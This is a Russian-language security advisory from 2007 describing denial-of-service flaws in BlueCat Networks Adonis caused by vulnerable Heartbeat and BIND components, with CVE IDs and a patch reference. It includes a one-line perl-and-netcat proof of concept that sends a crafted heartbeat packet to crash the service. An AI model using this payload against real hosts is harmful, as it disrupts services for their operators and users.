Security Lab

Отказ в обслуживании в BlueCat Networks Adonis

Дата публикации:03.08.2007
Дата изменения:09.08.2007
Всего просмотров:1112
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2007-2926
CVE-2007-4205
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
Спуфинг атака
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: BlueCat Networks Adonis
Уязвимые версии: BlueCat Networks Adonis 5.0.2.8, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании.

1. Уязвимость существует из-за того, что приложение использует уязвимую версию Heartbeat и присутствует на системах, где XHA сконфигурирован использовать 2 Adonis сервера в активном/пассивном кластере. Подробное описание уязвимости:
www.securitylab.ru/vulnerability/272070.php

Пример:
$ perl -e 'print "###\n2147483647heart attack:%%%\n"' |
nc -u 192.168.1.12 694

2. Уязвимость существует из-за того, что приложение использует уязвимую версию BIND. Подробное описание уязвимости:
www.securitylab.ru/vulnerability/300080.php

URL производителя: www.bluecatnetworks.com/products/adonis-dns-dhcp-appliances/

Решение: Для устранения уязвимости #1 установите исправление 5.0.4 с сайта производителя.